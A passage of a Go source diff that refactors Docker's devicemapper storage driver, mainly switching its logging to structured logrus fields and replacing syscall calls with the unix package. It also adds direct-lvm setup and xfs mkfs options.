"devicemapper").Warnf("Can't shrink loopback file %s", filename) } } return filename, nil @@ -356,10 +355,7 @@ func (devices *DeviceSet) saveMetadata(info *devInfo) error { if err != nil { return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err) } - if err := devices.writeMetaFile(jsonData, devices.metadataFile(info)); err != nil { - return err - } - return nil + return devices.writeMetaFile(jsonData, devices.metadataFile(info)) } func (devices *DeviceSet) markDeviceIDUsed(deviceID int) { @@ -380,10 +376,7 @@ func (devices *DeviceSet) isDeviceIDFree(deviceID int) bool { var mask byte i := deviceID % 8 mask = (1 << uint(i)) - if (devices.deviceIDMap[deviceID/8] & mask) != 0 { - return false - } - return true + return (devices.deviceIDMap[deviceID/8] & mask) == 0 } // Should be called with devices.Lock() held. @@ -410,39 +403,40 @@ func (devices *DeviceSet) lookupDeviceWithLock(hash string) (*devInfo, error) { // This function relies on that device hash map has been loaded in advance. // Should be called with devices.Lock() held. func (devices *DeviceSet) constructDeviceIDMap() { - logrus.Debug("devmapper: constructDeviceIDMap()") - defer logrus.Debug("devmapper: constructDeviceIDMap() END") + logrus.WithField("storage-driver", "devicemapper").Debug("constructDeviceIDMap()") + defer logrus.WithField("storage-driver", "devicemapper").Debug("constructDeviceIDMap() END") for _, info := range devices.Devices { devices.markDeviceIDUsed(info.DeviceID) - logrus.Debugf("devmapper: Added deviceId=%d to DeviceIdMap", info.DeviceID) + logrus.WithField("storage-driver", "devicemapper").Debugf("Added deviceId=%d to DeviceIdMap", info.DeviceID) } } func (devices *DeviceSet) deviceFileWalkFunction(path string, finfo os.FileInfo) error { + logger := logrus.WithField("storage-driver", "devicemapper") // Skip some of the meta files which are not device files. if strings.HasSuffix(finfo.Name(), ".migrated") { - logrus.Debugf("devmapper: Skipping file %s", path) + logger.Debugf("Skipping file %s", path) return nil } if strings.HasPrefix(finfo.Name(), ".") { - logrus.Debugf("devmapper: Skipping file %s", path) + logger.Debugf("Skipping file %s", path) return nil } if finfo.Name() == deviceSetMetaFile { - logrus.Debugf("devmapper: Skipping file %s", path) + logger.Debugf("Skipping file %s", path) return nil } if finfo.Name() == transactionMetaFile { - logrus.Debugf("devmapper: Skipping file %s", path) + logger.Debugf("Skipping file %s", path) return nil } - logrus.Debugf("devmapper: Loading data for file %s", path) + logger.Debugf("Loading data for file %s", path) hash := finfo.Name() if hash == "base" { @@ -459,12 +453,12 @@ func (devices *DeviceSet) deviceFileWalkFunction(path string, finfo os.FileInfo) } func (devices *DeviceSet) loadDeviceFilesOnStart() error { - logrus.Debug("devmapper: loadDeviceFilesOnStart()") - defer logrus.Debug("devmapper: loadDeviceFilesOnStart() END") + logrus.WithField("storage-driver", "devicemapper").Debug("loadDeviceFilesOnStart()") + defer logrus.WithField("storage-driver", "devicemapper").Debug("loadDeviceFilesOnStart() END") var scan = func(path string, info os.FileInfo, err error) error { if err != nil { - logrus.Debugf("devmapper: Can't walk the file %s", path) + logrus.WithField("storage-driver", "devicemapper").Debugf("Can't walk the file %s", path) return nil } @@ -480,17 +474,16 @@ func (devices *DeviceSet) loadDeviceFilesOnStart() error { } // Should be called with devices.Lock() held. -func (devices *DeviceSet) unregisterDevice(id int, hash string) error { - logrus.Debugf("devmapper: unregisterDevice(%v, %v)", id, hash) +func (devices *DeviceSet) unregisterDevice(hash string) error { + logrus.WithField("storage-driver", "devicemapper").Debugf("unregisterDevice(%v)", hash) info := &devInfo{ - Hash: hash, - DeviceID: id, + Hash: hash, } delete(devices.Devices, hash) if err := devices.removeMetadata(info); err != nil { - logrus.Debugf("devmapper: Error removing metadata: %s", err) + logrus.WithField("storage-driver", "devicemapper").Debugf("Error removing metadata: %s", err) return err } @@ -499,7 +492,7 @@ func (devices *DeviceSet) unregisterDevice(id int, hash string) error { // Should be called with devices.Lock() held. func (devices *DeviceSet) registerDevice(id int, hash string, size uint64, transactionID uint64) (*devInfo, error) { - logrus.Debugf("devmapper: registerDevice(%v, %v)", id, hash) + logrus.WithField("storage-driver", "devicemapper").Debugf("registerDevice(%v, %v)", id, hash) info := &devInfo{ Hash: hash, DeviceID: id, @@ -521,7 +514,7 @@ func (devices *DeviceSet) registerDevice(id int, hash string, size uint64, trans } func (devices *DeviceSet) activateDeviceIfNeeded(info *devInfo, ignoreDeleted bool) error { - logrus.Debugf("devmapper: activateDeviceIfNeeded(%v)", info.Hash) + logrus.WithField("storage-driver", "devicemapper").Debugf("activateDeviceIfNeeded(%v)", info.Hash) if info.Deleted && !ignoreDeleted { return fmt.Errorf("devmapper: Can't activate device %v as it is marked for deletion", info.Hash) @@ -540,11 +533,11 @@ func (devices *DeviceSet) activateDeviceIfNeeded(info *devInfo, ignoreDeleted bo return devicemapper.ActivateDevice(devices.getPoolDevName(), info.Name(), info.DeviceID, info.Size) } -// Return true only if kernel supports xfs and mkfs.xfs is available -func xfsSupported() bool { +// xfsSupported checks if xfs is supported, returns nil if it is, otherwise an error +func xfsSupported() error { // Make sure mkfs.xfs is available if _, err := exec.LookPath("mkfs.xfs"); err != nil { - return false + return err // error text is descriptive enough } // Check if kernel supports xfs filesystem or not. @@ -552,40 +545,47 @@ func xfsSupported() bool { f, err := os.Open("/proc/filesystems") if err != nil { - logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err) - return false + return errors.Wrapf(err, "error checking for xfs support") } defer f.Close() s := bufio.NewScanner(f) for s.Scan() { if strings.HasSuffix(s.Text(), "\txfs") { - return true + return nil } } if err := s.Err(); err != nil { - logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err) + return errors.Wrapf(err, "error checking for xfs support") } - return false + + return errors.New(`kernel does not support xfs, or "modprobe xfs" failed`) } func determineDefaultFS() string { - if xfsSupported() { + err := xfsSupported() + if err == nil { return "xfs" } - logrus.Warn("devmapper: XFS is not supported in your system. Either the kernel doesn't support it or mkfs.xfs is not in your PATH. Defaulting to ext4 filesystem") + logrus.WithField("storage-driver", "devicemapper").Warnf("XFS is not supported in your system (%v). Defaulting to ext4 filesystem", err) return "ext4" } -func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) { - devname := info.DevName() +// mkfsOptions tries to figure out whether some additional mkfs options are required +func mkfsOptions(fs string) []string { + if fs == "xfs" && !kernel.CheckKernelVersion(3, 16, 0) { + // For kernels earlier than 3.16 (and newer xfsutils), + // some xfs features need to be explicitly disabled. + return []string{"-m", "crc=0,finobt=0"} + } - args := []string{} - args = append(args, devices.mkfsArgs...) + return []string{} +} - args = append(args, devname) +func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) { + devname := info.DevName() if devices.filesystem == "" { devices.filesystem = determineDefaultFS() @@ -594,12 +594,16 @@ func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) { return err } - logrus.Infof("devmapper: Creating filesystem %s on device %s", devices.filesystem, info.Name()) + args := mkfsOptions(devices.filesystem) + args = append(args, devices.mkfsArgs...) + args = append(args, devname) + + logrus.WithField("storage-driver", "devicemapper").Infof("Creating filesystem %s on device %s, mkfs args: %v", devices.filesystem, info.Name(), args) defer func() { if err != nil { - logrus.Infof("devmapper: Error while creating filesystem %s on device %s: %v", devices.filesystem, info.Name(), err) + logrus.WithField("storage-driver", "devicemapper").Infof("Error while creating filesystem %s on device %s: %v", devices.filesystem, info.Name(), err) } else { - logrus.Infof("devmapper: Successfully created filesystem %s on device %s", devices.filesystem, info.Name()) + logrus.WithField("storage-driver", "devicemapper").Infof("Successfully created filesystem %s on device %s", devices.filesystem, info.Name()) } }() @@ -665,7 +669,7 @@ func (devices *DeviceSet) cleanupDeletedDevices() error { if !info.Deleted { continue } - logrus.Debugf("devmapper: Found deleted device %s.", info.Hash) + logrus.WithField("storage-driver", "devicemapper").Debugf("Found deleted device %s.", info.Hash) deletedDevices = append(deletedDevices, info) } @@ -676,7 +680,7 @@ func (devices *DeviceSet) cleanupDeletedDevices() error { for _, info := range deletedDevices { // This will again try deferred deletion. if err := devices.DeleteDevice(info.Hash, false); err != nil { - logrus.Warnf("devmapper: Deletion of device %s, device_id=%v failed:%v", info.Hash, info.DeviceID, err) + logrus.WithField("storage-driver", "devicemapper").Warnf("Deletion of device %s, device_id=%v failed:%v", info.Hash, info.DeviceID, err) } } @@ -698,7 +702,7 @@ func (devices *DeviceSet) startDeviceDeletionWorker() { return } - logrus.Debug("devmapper: Worker to cleanup deleted devices started") + logrus.WithField("storage-driver", "devicemapper").Debug("Worker to cleanup deleted devices started") for range devices.deletionWorkerTicker.C { devices.cleanupDeletedDevices() } @@ -794,8 +798,10 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) { return nil, err } + logger := logrus.WithField("storage-driver", "devicemapper") + if err := devices.openTransaction(hash, deviceID); err != nil { - logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID) + logger.Debugf("Error opening transaction hash = %s deviceID = %d", hash, deviceID) devices.markDeviceIDFree(deviceID) return nil, err } @@ -807,7 +813,7 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) { // happen. Now we have a mechanism to find // a free device ID. So something is not right. // Give a warning and continue. - logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID) + logger.Errorf("Device ID %d exists in pool but it is supposed to be unused", deviceID) deviceID, err = devices.getNextFreeDeviceID() if err != nil { return nil, err @@ -816,14 +822,14 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) { devices.refreshTransaction(deviceID) continue } - logrus.Debugf("devmapper: Error creating device: %s", err) + logger.Debugf("Error creating device: %s", err) devices.markDeviceIDFree(deviceID) return nil, err } break } - logrus.Debugf("devmapper: Registering device (id %v) with FS size %v", deviceID, devices.baseFsSize) + logger.Debugf("Registering device (id %v) with FS size %v", deviceID, devices.baseFsSize) info, err := devices.registerDevice(deviceID, hash, devices.baseFsSize, devices.OpenTransactionID) if err != nil { _ = devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) @@ -832,7 +838,7 @@ func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) { } if err := devices.closeTransaction(); err != nil { - devices.unregisterDevice(deviceID, hash) + devices.unregisterDevice(hash) devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) devices.markDeviceIDFree(deviceID) return nil, err @@ -862,6 +868,7 @@ func (devices *DeviceSet) takeSnapshot(hash string, baseInfo *devInfo, size uint if err != devicemapper.ErrEnxio { return err } + devinfo = nil } else { defer devices.deactivateDevice(baseInfo) } @@ -882,11 +889,7 @@ func (devices *DeviceSet) takeSnapshot(hash string, baseInfo *devInfo, size uint defer devicemapper.ResumeDevice(baseInfo.Name()) } - if err = devices.createRegisterSnapDevice(hash, baseInfo, size); err != nil { - return err - } - - return nil + return devices.createRegisterSnapDevice(hash, baseInfo, size) } func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInfo, size uint64) error { @@ -895,8 +898,10 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf return err } + logger := logrus.WithField("storage-driver", "devicemapper") + if err := devices.openTransaction(hash, deviceID); err != nil { - logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID) + logger.Debugf("Error opening transaction hash = %s deviceID = %d", hash, deviceID) devices.markDeviceIDFree(deviceID) return err } @@ -908,7 +913,7 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf // happen. Now we have a mechanism to find // a free device ID. So something is not right. // Give a warning and continue. - logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID) + logger.Errorf("Device ID %d exists in pool but it is supposed to be unused", deviceID) deviceID, err = devices.getNextFreeDeviceID() if err != nil { return err @@ -917,7 +922,7 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf devices.refreshTransaction(deviceID) continue } - logrus.Debugf("devmapper: Error creating snap device: %s", err) + logger.Debugf("Error creating snap device: %s", err) devices.markDeviceIDFree(deviceID) return err } @@ -927,12 +932,12 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf if _, err := devices.registerDevice(deviceID, hash, size, devices.OpenTransactionID); err != nil { devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) devices.markDeviceIDFree(deviceID) - logrus.Debugf("devmapper: Error registering device: %s", err) + logger.Debugf("Error registering device: %s", err) return err } if err := devices.closeTransaction(); err != nil { - devices.unregisterDevice(deviceID, hash) + devices.unregisterDevice(hash) devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) devices.markDeviceIDFree(deviceID) return err @@ -942,20 +947,21 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInf func (devices *DeviceSet) loadMetadata(hash string) *devInfo { info := &devInfo{Hash: hash, devices: devices} + logger := logrus.WithField("storage-driver", "devicemapper") jsonData, err := ioutil.ReadFile(devices.metadataFile(info)) if err != nil { - logrus.Debugf("devmapper: Failed to read %s with err: %v", devices.metadataFile(info), err) + logger.Debugf("Failed to read %s with err: %v", devices.metadataFile(info), err) return nil } if err := json.Unmarshal(jsonData, &info); err != nil { - logrus.Debugf("devmapper: Failed to unmarshal devInfo from %s with err: %v", devices.metadataFile(info), err) + logger.Debugf("Failed to unmarshal devInfo from %s with err: %v", devices.metadataFile(info), err) return nil } if info.DeviceID > maxDeviceID { - logrus.Errorf("devmapper: Ignoring Invalid DeviceId=%d", info.DeviceID) + logger.Errorf("Ignoring Invalid DeviceId=%d", info.DeviceID) return nil } @@ -970,7 +976,7 @@ func getDeviceUUID(device string) (string, error) { uuid := strings.TrimSuffix(string(out), "\n") uuid = strings.TrimSpace(uuid) - logrus.Debugf("devmapper: UUID for device: %s is:%s", device, uuid) + logrus.WithField("storage-driver", "devicemapper").Debugf("UUID for device: %s is:%s", device, uuid) return uuid, nil } @@ -1018,7 +1024,7 @@ func (devices *DeviceSet) verifyBaseDeviceUUIDFS(baseInfo *devInfo) error { // file system of base image is not same, warn user that dm.fs // will be ignored. if devices.BaseDeviceFilesystem != devices.filesystem { - logrus.Warnf("devmapper: Base device already exists and has filesystem %s on it. User specified filesystem %s will be ignored.", devices.BaseDeviceFilesystem, devices.filesystem) + logrus.WithField("storage-driver", "devicemapper").Warnf("Base device already exists and has filesystem %s on it. User specified filesystem %s will be ignored.", devices.BaseDeviceFilesystem, devices.filesystem) devices.filesystem = devices.BaseDeviceFilesystem } return nil @@ -1048,7 +1054,7 @@ func (devices *DeviceSet) saveBaseDeviceUUID(baseInfo *devInfo) error { } func (devices *DeviceSet) createBaseImage() error { - logrus.Debug("devmapper: Initializing base device-mapper thin volume") + logrus.WithField("storage-driver", "devicemapper").Debug("Initializing base device-mapper thin volume") // Create initial device info, err := devices.createRegisterDevice("") @@ -1056,7 +1062,7 @@ func (devices *DeviceSet) createBaseImage() error { return err } - logrus.Debug("devmapper: Creating filesystem on base device-mapper thin volume") + logrus.WithField("storage-driver", "devicemapper").Debug("Creating filesystem on base device-mapper thin volume") if err := devices.activateDeviceIfNeeded(info, false); err != nil { return err @@ -1082,7 +1088,7 @@ func (devices *DeviceSet) createBaseImage() error { // Returns if thin pool device exists or not. If device exists, also makes // sure it is a thin pool device and not some other type of device. func (devices *DeviceSet) thinPoolExists(thinPoolDevice string) (bool, error) { - logrus.Debugf("devmapper: Checking for existence of the pool %s", thinPoolDevice) + logrus.WithField("storage-driver", "devicemapper").Debugf("Checking for existence of the pool %s", thinPoolDevice) info, err := devicemapper.GetInfo(thinPoolDevice) if err != nil { @@ -1194,10 +1200,10 @@ func (devices *DeviceSet) growFS(info *devInfo) error { options = joinMountOptions(options, devices.mountOptions) if err := mount.Mount(info.DevName(), fsMountPoint, devices.BaseDeviceFilesystem, options); err != nil { - return fmt.Errorf("Error mounting '%s' on '%s': %s", info.DevName(), fsMountPoint, err) + return fmt.Errorf("Error mounting '%s' on '%s' (fstype='%s' options='%s'): %s\n%v", info.DevName(), fsMountPoint, devices.BaseDeviceFilesystem, options, err, string(dmesg.Dmesg(256))) } - defer syscall.Unmount(fsMountPoint, syscall.MNT_DETACH) + defer unix.Unmount(fsMountPoint, unix.MNT_DETACH) switch devices.BaseDeviceFilesystem { case "ext4": @@ -1226,15 +1232,10 @@ func (devices *DeviceSet) setupBaseImage() error { if err := devices.setupVerifyBaseImageUUIDFS(oldInfo); err != nil { return err } - - if err := devices.checkGrowBaseDeviceFS(oldInfo); err != nil { - return err - } - - return nil + return devices.checkGrowBaseDeviceFS(oldInfo) } - logrus.Debug("devmapper: Removing uninitialized base image") + logrus.WithField("storage-driver", "devicemapper").Debug("Removing uninitialized base image") // If previous base device is in deferred delete state, // that needs to be cleaned up first. So don't try // deferred deletion. @@ -1252,47 +1253,22 @@ func (devices *DeviceSet) setupBaseImage() error { } // Create new base image device - if err := devices.createBaseImage(); err != nil { - return err - } - - return nil + return devices.createBaseImage() } func setCloseOnExec(name string) { - if fileInfos, _ := ioutil.ReadDir("/proc/self/fd"); fileInfos != nil { - for _, i := range fileInfos { - link, _ := os.Readlink(filepath.Join("/proc/self/fd", i.Name())) - if link == name { - fd, err := strconv.Atoi(i.Name()) - if err == nil { - syscall.CloseOnExec(fd) - } + fileInfos, _ := ioutil.ReadDir("/proc/self/fd") + for _, i := range fileInfos { + link, _ := os.Readlink(filepath.Join("/proc/self/fd", i.Name())) + if link == name { + fd, err := strconv.Atoi(i.Name()) + if err == nil { + unix.CloseOnExec(fd) } } } } -// DMLog implements logging using DevMapperLogger interface. -func (devices *DeviceSet) DMLog(level int, file string, line int, dmError int, message string) { - // By default libdm sends us all the messages including debug ones. - // We need to filter out messages here and figure out which one - // should be printed. - if level > logLevel { - return - } - - // FIXME(vbatts) push this back into ./pkg/devicemapper/ - if level <= devicemapper.LogLevelErr { - logrus.Errorf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) - } else if level <= devicemapper.LogLevelInfo { - logrus.Infof("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) - } else { - // FIXME(vbatts) push this back into ./pkg/devicemapper/ - logrus.Debugf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) - } -} - func major(device uint64) uint64 { return (device >> 8) & 0xfff } @@ -1400,31 +1376,30 @@ func (devices *DeviceSet) saveTransactionMetaData() error { } func (devices *DeviceSet) removeTransactionMetaData() error { - if err := os.RemoveAll(devices.transactionMetaFile()); err != nil { - return err - } - return nil + return os.RemoveAll(devices.transactionMetaFile()) } func (devices *DeviceSet) rollbackTransaction() error { - logrus.Debugf("devmapper: Rolling back open transaction: TransactionID=%d hash=%s device_id=%d", devices.OpenTransactionID, devices.DeviceIDHash, devices.DeviceID) + logger := logrus.WithField("storage-driver", "devicemapper") + + logger.Debugf("Rolling back open transaction: TransactionID=%d hash=%s device_id=%d", devices.OpenTransactionID, devices.DeviceIDHash, devices.DeviceID) // A device id might have already been deleted before transaction // closed. In that case this call will fail. Just leave a message // in case of failure. if err := devicemapper.DeleteDevice(devices.getPoolDevName(), devices.DeviceID); err != nil { - logrus.Errorf("devmapper: Unable to delete device: %s", err) + logger.Errorf("Unable to delete device: %s", err) } dinfo := &devInfo{Hash: devices.DeviceIDHash} if err := devices.removeMetadata(dinfo); err != nil { - logrus.Errorf("devmapper: Unable to remove metadata: %s", err) + logger.Errorf("Unable to remove metadata: %s", err) } else { devices.markDeviceIDFree(devices.DeviceID) } if err := devices.removeTransactionMetaData(); err != nil { - logrus.Errorf("devmapper: Unable to remove transaction meta file %s: %s", devices.transactionMetaFile(), err) + logger.Errorf("Unable to remove transaction meta file %s: %s", devices.transactionMetaFile(), err) } return nil @@ -1444,7 +1419,7 @@ func (devices *DeviceSet) processPendingTransaction() error { // If open transaction ID is less than pool transaction ID, something // is wrong. Bail out. if devices.OpenTransactionID < devices.TransactionID { - logrus.Errorf("devmapper: Open Transaction id %d is less than pool transaction id %d", devices.OpenTransactionID, devices.TransactionID) + logrus.WithField("storage-driver", "devicemapper").Errorf("Open Transaction id %d is less than pool transaction id %d", devices.OpenTransactionID, devices.TransactionID) return nil } @@ -1501,19 +1476,16 @@ func (devices *DeviceSet) refreshTransaction(DeviceID int) error { func (devices *DeviceSet) closeTransaction() error { if err := devices.updatePoolTransactionID(); err != nil { - logrus.Debug("devmapper: Failed to close Transaction") + logrus.WithField("storage-driver", "devicemapper").Debug("Failed to close Transaction") return err } return nil } func determineDriverCapabilities(version string) error { - /* - * Driver version 4.27.0 and greater support deferred activation - * feature. - */ + // Kernel driver version >= 4.27.0 support deferred removal - logrus.Debugf("devicemapper: driver version is %s", version) + logrus.WithField("storage-driver", "devicemapper").Debugf("kernel dm driver version is %s", version) versionSplit := strings.Split(version, ".") major, err := strconv.Atoi(versionSplit[0]) @@ -1549,16 +1521,17 @@ func determineDriverCapabilities(version string) error { // Determine the major and minor number of loopback device func getDeviceMajorMinor(file *os.File) (uint64, uint64, error) { - stat, err := file.Stat() + var stat unix.Stat_t + err := unix.Stat(file.Name(), &stat) if err != nil { return 0, 0, err } - dev := stat.Sys().(*syscall.Stat_t).Rdev + dev := stat.Rdev majorNum := major(dev) minorNum := minor(dev) - logrus.Debugf("devmapper: Major:Minor for device: %s is:%v:%v", file.Name(), majorNum, minorNum) + logrus.WithField("storage-driver", "devicemapper").Debugf("Major:Minor for device: %s is:%v:%v", file.Name(), majorNum, minorNum) return majorNum, minorNum, nil } @@ -1567,7 +1540,7 @@ func getDeviceMajorMinor(file *os.File) (uint64, uint64, error) { func getLoopFileDeviceMajMin(filename string) (string, uint64, uint64, error) { file, err := os.Open(filename) if err != nil { - logrus.Debugf("devmapper: Failed to open file %s", filename) + logrus.WithField("storage-driver", "devicemapper").Debugf("Failed to open file %s", filename) return "", 0, 0, err } @@ -1598,7 +1571,7 @@ func (devices *DeviceSet) getThinPoolDataMetaMajMin() (uint64, uint64, uint64, u return 0, 0, 0, 0, err } - logrus.Debugf("devmapper: poolDataMajMin=%s poolMetaMajMin=%s\n", poolDataMajMin, poolMetadataMajMin) + logrus.WithField("storage-driver", "devicemapper").Debugf("poolDataMajMin=%s poolMetaMajMin=%s\n", poolDataMajMin, poolMetadataMajMin) poolDataMajMinorSplit := strings.Split(poolDataMajMin, ":") poolDataMajor, err := strconv.ParseUint(poolDataMajMinorSplit[0], 10, 32) @@ -1678,7 +1651,7 @@ func (devices *DeviceSet) enableDeferredRemovalDeletion() error { if !devicemapper.LibraryDeferredRemovalSupport { return fmt.Errorf("devmapper: Deferred removal can not be enabled as libdm does not support it") } - logrus.Debug("devmapper: Deferred removal support enabled.") + logrus.WithField("storage-driver", "devicemapper").Debug("Deferred removal support enabled.") devices.deferredRemove = true } @@ -1686,36 +1659,25 @@ func (devices *DeviceSet) enableDeferredRemovalDeletion() error { if !devices.deferredRemove { return fmt.Errorf("devmapper: Deferred deletion can not be enabled as deferred removal is not enabled. Enable deferred removal using --storage-opt dm.use_deferred_removal=true parameter") } - logrus.Debug("devmapper: Deferred deletion support enabled.") + logrus.WithField("storage-driver", "devicemapper").Debug("Deferred deletion support enabled.") devices.deferredDelete = true } return nil } -func (devices *DeviceSet) initDevmapper(doInit bool) error { - // give ourselves to libdm as a log handler - devicemapper.LogInit(devices) - - version, err := devicemapper.GetDriverVersion() - if err != nil { - // Can't even get driver version, assume not supported - return graphdriver.ErrNotSupported - } - - if err := determineDriverCapabilities(version); err != nil { - return graphdriver.ErrNotSupported - } - +func (devices *DeviceSet) initDevmapper(doInit bool) (retErr error) { if err := devices.enableDeferredRemovalDeletion(); err != nil { return err } + logger := logrus.WithField("storage-driver", "devicemapper") + // https://github.com/docker/docker/issues/4036 if supported := devicemapper.UdevSetSyncSupport(true); !supported { if dockerversion.IAmStatic == "true" { - logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a dynamic binary to use devicemapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option") + logger.Error("Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a dynamic binary to use devicemapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/dockerd/#storage-driver-options") } else { - logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a more recent version of libdevmapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option") + logger.Error("Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a more recent version of libdevmapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/dockerd/#storage-driver-options") } if !devices.overrideUdevSyncCheck { @@ -1729,28 +1691,55 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { if err != nil { return err } - if err := idtools.MkdirAs(devices.root, 0700, uid, gid); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAndChown(devices.root, 0700, idtools.IDPair{UID: uid, GID: gid}); err != nil { return err } - if err := os.MkdirAll(devices.metadataDir(), 0700); err != nil && !os.IsExist(err) { + if err := os.MkdirAll(devices.metadataDir(), 0700); err != nil { return err } - // Set the device prefix from the device id and inode of the docker root dir - - st, err := os.Stat(devices.root) + prevSetupConfig, err := readLVMConfig(devices.root) if err != nil { + return err + } + + if !reflect.DeepEqual(devices.lvmSetupConfig, directLVMConfig{}) { + if devices.thinPoolDevice != "" { + return errors.New("cannot setup direct-lvm when `dm.thinpooldev` is also specified") + } + + if !reflect.DeepEqual(prevSetupConfig, devices.lvmSetupConfig) { + if !reflect.DeepEqual(prevSetupConfig, directLVMConfig{}) { + return errors.New("changing direct-lvm config is not supported") + } + logger.WithField("direct-lvm-config", devices.lvmSetupConfig).Debugf("Setting up direct lvm mode") + if err := verifyBlockDevice(devices.lvmSetupConfig.Device, lvmSetupConfigForce); err != nil { + return err + } + if err := setupDirectLVM(devices.lvmSetupConfig); err != nil { + return err + } + if err := writeLVMConfig(devices.root, devices.lvmSetupConfig); err != nil { + return err + } + } + devices.thinPoolDevice = "docker-thinpool" + logger.Debugf("Setting dm.thinpooldev to %q", devices.thinPoolDevice) + } + + // Set the device prefix from the device id and inode of the docker root dir + var st unix.Stat_t + if err := unix.Stat(devices.root, &st); err != nil { return fmt.Errorf("devmapper: Error looking up dir %s: %s", devices.root, err) } - sysSt := st.Sys().(*syscall.Stat_t) // "reg-" stands for "regular file". // In the future we might use "dev-" for "device file", etc. // docker-maj,min[-inode] stands for: // - Managed by docker // - The target of this device is at major and minor // - If is defined, use that file inside the device as a loopback image. Otherwise use the device itself. - devices.devicePrefix = fmt.Sprintf("docker-%d:%d-%d", major(sysSt.Dev), minor(sysSt.Dev), sysSt.Ino) - logrus.Debugf("devmapper: Generated prefix: %s", devices.devicePrefix) + devices.devicePrefix = fmt.Sprintf("docker-%d:%d-%d", major(st.Dev), minor(st.Dev), st.Ino) + logger.Debugf("Generated prefix: %s", devices.devicePrefix) // Check for the existence of the thin-pool device poolExists, err := devices.thinPoolExists(devices.getPoolName()) @@ -1770,7 +1759,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { // If the pool doesn't exist, create it if !poolExists && devices.thinPoolDevice == "" { - logrus.Debug("devmapper: Pool doesn't exist. Creating it.") + logger.Debug("Pool doesn't exist. Creating it.") var ( dataFile *os.File @@ -1792,7 +1781,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { data, err := devices.ensureImage("data", devices.dataLoopbackSize) if err != nil { - logrus.Debugf("devmapper: Error device ensureImage (data): %s", err) + logger.Debugf("Error device ensureImage (data): %s", err) return err } @@ -1825,7 +1814,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { metadata, err := devices.ensureImage("metadata", devices.metaDataLoopbackSize) if err != nil { - logrus.Debugf("devmapper: Error device ensureImage (metadata): %s", err) + logger.Debugf("Error device ensureImage (metadata): %s", err) return err } @@ -1846,6 +1835,14 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { if err := devicemapper.CreatePool(devices.getPoolName(), dataFile, metadataFile, devices.thinpBlockSize); err != nil { return err } + defer func() { + if retErr != nil { + err = devices.deactivatePool() + if err != nil { + logger.Warnf("Failed to deactivatePool: %v", err) + } + } + }() } // Pool already exists and caller did not pass us a pool. That means @@ -1854,7 +1851,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { // pool, like is it using loop devices. if poolExists && devices.thinPoolDevice == "" { if err := devices.loadThinPoolLoopBackInfo(); err != nil { - logrus.Debugf("devmapper: Failed to load thin pool loopback device information:%v", err) + logger.Debugf("Failed to load thin pool loopback device information:%v", err) return err } } @@ -1869,7 +1866,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { if devices.thinPoolDevice == "" { if devices.metadataLoopFile != "" || devices.dataLoopFile != "" { - logrus.Warn("devmapper: Usage of loopback devices is strongly discouraged for production use. Please use `--storage-opt dm.thinpooldev` or use `man docker` to refer to dm.thinpooldev section.") + logger.Warn("Usage of loopback devices is strongly discouraged for production use. Please use `--storage-opt dm.thinpooldev` or use `man dockerd` to refer to dm.thinpooldev section.") } } @@ -1882,7 +1879,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { // Setup the base image if doInit { if err := devices.setupBaseImage(); err != nil { - logrus.Debugf("devmapper: Error device setupBaseImage: %s", err) + logger.Debugf("Error device setupBaseImage: %s", err) return err } } @@ -1892,8 +1889,8 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { // AddDevice adds a device and registers in the hash. func (devices *DeviceSet) AddDevice(hash, baseHash string, storageOpt map[string]string) error { - logrus.Debugf("devmapper: AddDevice START(hash=%s basehash=%s)", hash, baseHash) - defer logrus.Debugf("devmapper: AddDevice END(hash=%s basehash=%s)", hash, baseHash) + logrus.WithField("storage-driver", "devicemapper").Debugf("AddDevice START(hash=%s basehash=%s)", hash, baseHash) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("AddDevice END(hash=%s basehash=%s)", 